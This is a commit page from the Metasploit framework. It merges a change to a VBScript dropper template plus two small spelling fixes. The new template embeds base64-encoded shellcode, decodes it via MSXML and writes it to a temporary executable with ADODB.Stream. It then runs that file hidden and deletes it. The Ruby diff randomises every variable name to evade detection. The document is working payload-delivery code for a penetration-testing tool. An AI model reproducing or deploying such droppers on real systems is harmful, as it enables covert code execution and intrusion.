Skip to content

Commit ee40c9d

Browse files
committed
Land rapid7#6625, Send base64ed shellcode and decode with certutil (Actually MSXML)
2 parents f2a608b + 2525eab commit ee40c9d

File tree

4 files changed

+27
-15
lines changed

4 files changed

+27
-15
lines changed

data/templates/scripts/to_exe.vbs.template

Lines changed: 17 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -1,23 +1,31 @@
1-
Function %{var_func}()
2-
%{var_shellcode} = "%{hex_shellcode}"
1+
Function %{var_decodefunc}(%{var_decodebase64})
2+
%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
3+
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
4+
%{var_decodebase64} & "</B64DECODE>"
5+
Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
6+
%{var_xmldoc}.LoadXML(%{var_xml})
7+
%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
8+
set %{var_xmldoc} = nothing
9+
End Function
310

11+
Function %{var_func}()
12+
%{var_shellcode} = "%{base64_shellcode}"
413
Dim %{var_obj}
514
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
6-
Dim %{var_stream}
715
Dim %{var_tempdir}
8-
Dim %{var_tempexe}
916
Dim %{var_basedir}
1017
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
1118
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
1219
%{var_obj}.CreateFolder(%{var_basedir})
1320
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
14-
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
15-
For i = 1 to Len(%{var_shellcode}) Step 2
16-
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
17-
Next
18-
%{var_stream}.Close
1921
Dim %{var_shell}
2022
Set %{var_shell} = CreateObject("Wscript.Shell")
23+
%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
24+
Set %{var_adodbstream} = CreateObject("ADODB.Stream")
25+
%{var_adodbstream}.Type = 1
26+
%{var_adodbstream}.Open
27+
%{var_adodbstream}.Write %{var_decoded}
28+
%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
2129
%{var_shell}.run %{var_tempexe}, 0, true
2230
%{var_obj}.DeleteFile(%{var_tempexe})
2331
%{var_obj}.DeleteFolder(%{var_basedir})

lib/msf/core/exploit/smb/client/psexec.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -164,7 +164,7 @@ def psexec(command, disconnect=true)
164164
if service_exists
165165
print_warning("Not removing service as it already existed...")
166166
elsif datastore['SERVICE_PERSIST']
167-
print_warning("Not removing service for persistance...")
167+
print_warning("Not removing service for persistence...")
168168
else
169169
vprint_status("Removing the service...")
170170
svc_status = svc_client.deleteservice(svc_handle)

lib/msf/util/exe.rb

Lines changed: 8 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1266,18 +1266,22 @@ def self.to_exe_vbs(exes = '', opts = {})
12661266

12671267
hash_sub = {}
12681268
hash_sub[:exe_filename] = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
1269+
hash_sub[:base64_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
12691270
hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
12701271
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
12711272
hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
1272-
hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8)
12731273
hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8)
12741274
hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
12751275
hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
12761276
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
12771277
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
1278-
1279-
hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
1280-
1278+
hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
1279+
hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
1280+
hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
1281+
hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
1282+
hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
1283+
hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
1284+
hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
12811285
hash_sub[:init] = ""
12821286

12831287
if persist

scripts/meterpreter/persistence.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -228,7 +228,7 @@ def install_as_service(script_on_target)
228228

229229
# Check for Version of Meterpreter
230230
wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
231-
print_status("Running Persistance Script")
231+
print_status("Running Persistence Script")
232232
# Create undo script
233233
@clean_up_rc = log_file()
234234
print_status("Resource file for cleanup created at #{@clean_up_rc}")

0 commit comments

Comments
 (0)